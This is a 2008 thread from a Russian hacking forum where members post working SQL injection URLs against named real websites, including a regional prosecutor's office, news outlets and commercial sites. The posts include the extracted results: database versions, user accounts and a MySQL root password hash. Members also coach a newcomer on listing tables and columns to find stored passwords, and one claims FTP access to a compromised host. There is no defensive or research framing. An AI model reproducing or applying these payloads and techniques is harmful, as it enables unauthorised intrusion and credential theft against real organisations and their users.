ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7191  
Старый 27.12.2008, 15:51
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Это верно..

http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9--

http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,user,password), 3,4,5,6,7,8,9+from+mysql.user--

root::*29D1EAE62F6F4F8D245F4F03DC8D4B6FD99516C4

version:5.0.21-log
user:root@localhost
database:yesoudo

Татуировочки..

http://tatty.ru/galary/index.php?id=-41+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13/*

version:4.1.22
user:tropico_mysql@10.1.10.215
database:tropico_db
 
Ответить с цитированием

  #7192  
Старый 27.12.2008, 20:06
Аватар для vladvk
vladvk
Новичок
Регистрация: 22.12.2008
Сообщений: 16
Провел на форуме:
59223

Репутация: 7
По умолчанию

Чтото я не вьеду а где пароли:
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
 
Ответить с цитированием

  #7193  
Старый 27.12.2008, 20:21
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Чтото я не вьеду а где пароли:
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
Это ты вывел все таблицы, которые есть в базе сайта, но не пароли!
 
Ответить с цитированием

  #7194  
Старый 27.12.2008, 20:43
Аватар для Thrasher88
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

Поиском ничего из этого не нашел, так что извиняете, если уже было..

trud.ru - интернет-издание
Цитата:
http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8--
Version - 4.1.21-log
User - trudinfo@localhost
Database - trudinfo_db

Google PR: 8
Yandex тИЦ: 6900
Alexa.com: 3429

apa.az - азербайджанский новостной сайт
Цитата:
http://ru.apa.az/news.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
Version 5.0.67-community
User apaadm_user@localhost
Database apaadm_ru

Google PR: 6

www.remsoft.com - "программное обеспечение для промышленности"
Цитата:
http://www.remsoft.com/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a3a,version(),us er(),database()),5--
Version 4.1.22-community-nt-log
User remsoft@WSH-004
Database remsoft

Google PR: 5

www.chuvprok.gov.ru - сайт Прокуратуры Чувашской области
Цитата:
http://www.chuvprok.gov.ru/news.php?id=-1+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3,4,5--
Version 4.0.17-nt
User prokuratura@localhost
Database prokuratura

Последний раз редактировалось Thrasher88; 27.12.2008 в 21:28..
 
Ответить с цитированием

  #7195  
Старый 27.12.2008, 21:06
Аватар для vladvk
vladvk
Новичок
Регистрация: 22.12.2008
Сообщений: 16
Провел на форуме:
59223

Репутация: 7
По умолчанию

Цитата:
Сообщение от mailbrush  
Это ты вывел все таблицы, которые есть в базе сайта, но не пароли!
Да я знаю что таблици и колонки выводил но в какой таблици могут быть пороли ума не прилажу
 
Ответить с цитированием

  #7196  
Старый 27.12.2008, 21:15
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

Цитата:
Сообщение от mailbrush  
Это ты вывел все таблицы, которые есть в базе сайта, но не пароли!
нет,не все..а только первую..а всё выводятся так:
http://www.artmos.ru/art.php?st=-4+union+select+1,unhex(hex(group_concat(table_name ))),3+from+information_schema.tables--
пассов тут и не должно быть по мойму..сайт ваще чо-то стрёмный..
File_priv - N
админки думаю нет..табл никаких норм нет..
p.s. учите русский язык и пишите норм.
 
Ответить с цитированием

  #7197  
Старый 27.12.2008, 21:20
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
Wink

Цитата:
Сообщение от vladvk  
Чтото я не вьеду а где пароли:
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
Здесь 3 бд:
Код:
information_schema
Код:
avtosite_art
Код:
test
Выведим из всех бд название таблиц и колонок:
Код:
http://www.artmos.ru/art.php?st=-4+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3+from+information_schema.columns--
Ну а далюше уже сам их перебирай, мож чет и найдешь...

Последний раз редактировалось -m0rgan-; 27.12.2008 в 21:30..
 
Ответить с цитированием

  #7198  
Старый 27.12.2008, 21:50
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Цитата:
Сообщение от faza02  
не прет сегодня на скули..
Код:
http://www.heimlichinstitute.org/page.php?id=-4+union+select+1,2,3,4/*
пр: 5
Код:
http://www.heimlichinstitute.org/page.php?id=-4+union+select+1,convert(concat(table_schema,0x3a,table_name,0x3a,column_name) using latin1),3,4+from+information_schema.columns+limit+1,1--
Там менще 30таблиц и больше 100 колонок...
 
Ответить с цитированием

  #7199  
Старый 27.12.2008, 22:06
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
http://www.artmos.ru/
Ы) У мну фтпшник есть к хостингу этого сайта =).
http://www.artmos.ru/xfile.htm
 
Ответить с цитированием

  #7200  
Старый 27.12.2008, 22:23
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
Таблиц: 44
Код:
 st_adruweb
 st_allavtotuning
 st_artmos
 st_avtositeinfo
 st_avtositeru
 st_bugattiinfo
 st_chryslerinfo
 st_doktoru
 st_elpages
 st_emasters
 st_euroavtomobiles
 st_evronedvizhimost
 st_evrooknapvh
 st_ferrariinfo
 st_fordinfo
 st_greatsettop
 st_kamaz
 st_kriminal
 st_lamborghiniinfo
 st_marketru
 st_med
 st_mlogo
 st_mmf
 st_mobiart
 st_mobilasoft
 st_mobileafisha
 st_mobilextreme
 st_mytehavto
 st_onliner
 st_polyfoniya
 st_prestizhnedv
 st_pro
 st_realwebsite
 st_renoclub
 st_rostdohodov
 st_rosttic
 st_scanditour
 st_style
 st_tehokna
 st_teklait
 st_tel
 st_valeh
 st_virsklad
 st_you

Последний раз редактировалось mailbrush; 27.12.2008 в 22:28..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ